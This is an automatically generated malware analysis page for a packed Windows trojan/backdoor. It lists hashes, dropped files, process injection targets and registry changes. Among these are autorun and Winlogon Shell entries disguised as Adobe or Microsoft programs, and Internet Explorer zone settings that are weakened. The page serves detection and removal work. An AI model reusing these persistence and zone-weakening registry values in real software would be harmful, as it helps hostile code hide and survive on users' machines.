Trojan.Generic.11523736_26eb2a1694

by malwarelabrobot on August 2nd, 2014 in Malware Descriptions.

HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.11523736 (B) (Emsisoft), Trojan.Generic.11523736 (AdAware), Backdoor.Win32.Farfli.FD, GenericInjector.YR (Lavasoft MAS)
Behaviour: Trojan, Backdoor


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 26eb2a1694323fc21c7c2448c08874d0
SHA1: 62461fda74be31b667a58bc9ca30e26066ce42b7
SHA256: 107a36254acb827f9c8e8198bb1684069b88f367c54c25fa6bacaf709f9fc580
SSDeep: 98304:v3v 74YeXX6NpGIPwrUwj2R/EX/ /hN40kpF :vf 0/XqNkCz/EW54p8
Size: 4305920 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2010-03-07 18:08:39
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

TEST3.EXE:1688
WUPDATE.EXE:960
TEST.EXE:640
TEST2.EXE:1636
WINUPDATE.EXE:560
WINUPDATE.EXE:1984
%original file name%.exe:1504
OPENGL.EXE:2008
CRYPT.EXE:1552
HSCB.EXE:952

The Trojan injects its code into the following process(es):

HIDDEN SIGHT.EXE:1944
OPENGL.EXE:1300
svchost.exe:1368

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process TEST3.EXE:1688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\TEST2.EXE (15801 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (13 bytes)

The process TEST.EXE:640 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\CRYPT.EXE (5442 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\HSCB.EXE (7386 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\WINUPDATE.EXE (186 bytes)

The process TEST2.EXE:1636 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\WUPDATE.EXE (83 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TEST.EXE (15021 bytes)

The process WINUPDATE.EXE:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\OPENGL.EXE (246 bytes)

The process WINUPDATE.EXE:1984 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (7547 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (0 bytes)

The process %original file name%.exe:1504 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\winlogon.exe (31071 bytes)

The process OPENGL.EXE:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)

The process CRYPT.EXE:1552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Microsoft\HeciServer.exe (7433 bytes)

The process HSCB.EXE:952 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\HIDDEN SIGHT.EXE (7386 bytes)

Registry activity

The process TEST3.EXE:1688 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "65 92 ED 02 32 46 B0 A6 CF F1 B8 96 FD 0D 16 27"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"OPENGL.EXE" = "OPENGL"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"test2.exe" = "TEST2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process HIDDEN SIGHT.EXE:1944 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "70 3B 48 42 1E 9E C2 D2 29 34 2C B1 C9 83 E3 2B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process WUPDATE.EXE:960 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\WinRAR]
"HWID" = "7B 34 34 37 46 33 38 31 43 2D 36 37 33 45 2D 34"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"ParseAutoexec" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\Administrator\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 F6 A7 35 9A F9 AA 1C F1 55 B1 47 6A 48 00 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKU\S-1-5-21-1844237615-1960408961-1801674531-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\Administrator\Local Settings\Application Data"

[HKCU\Software\WinRAR]
"HWID" = "7B 35 31 34 37 33 45 42 32 2D 45 46 35 41 2D 34"

The process TEST.EXE:640 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7C 6B 07 3F 0A 9B 34 4F 70 16 3F AB ED 22 66 52"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HSCB.EXE" = "HSCB"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"CRYPT.EXE" = "CRYPT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process TEST2.EXE:1636 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 9C 73 6E E4 9A 68 63 99 DA 58 7F 7B 6C 64 68"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"test.exe" = "TEST"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"wupdate.exe" = "WUPDATE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WINUPDATE.EXE:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2B 3A CA B0 5C 6D 51 B9 88 A3 1A 7B 71 F6 2A 42"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process WINUPDATE.EXE:1984 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "71 49 3B 43 C2 33 F2 A0 F4 47 8B F4 54 3E 40 F8"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Flash Player" = "%AppData%\Microsoft\winlogon.exe"

The process %original file name%.exe:1504 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7E 53 75 94 9C D4 04 CB 5C 18 89 93 55 7A AD ED"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\winlogon.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Adobe Reader" = "%AppData%\Microsoft\winlogon.exe"

The process OPENGL.EXE:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CachePath" = "%USERPROFILE%\Local Settings\History\History.IE5\MSHist012014080120140802\"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CacheOptions" = "11"
"CacheRepair" = "0"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CacheLimit" = "8192"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "13 75 D5 55 04 97 81 73 5B 0E 8F 4B B1 A3 61 F2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014080120140802]
"CachePrefix" = ":2014080120140802:"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012014031720140318]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process CRYPT.EXE:1552 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 4C 34 7F 56 AE C3 DD D0 6B 35 8F 52 40 B4 30"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run]
"Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

The Trojan adds the reference to itself to be executed when a user logs on:

[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "%AppData%\Microsoft\HeciServer.exe,explorer.exe"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"Microsoft(R) Delayed Launcher" = "%AppData%\Microsoft\HeciServer.exe"

The process HSCB.EXE:952 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "11 75 42 BC 74 B9 80 45 C3 10 03 77 28 4F DB 18"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"HIDDEN SIGHT.EXE" = "| Hidden Sight |"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Dropped PE files

MD5 File path
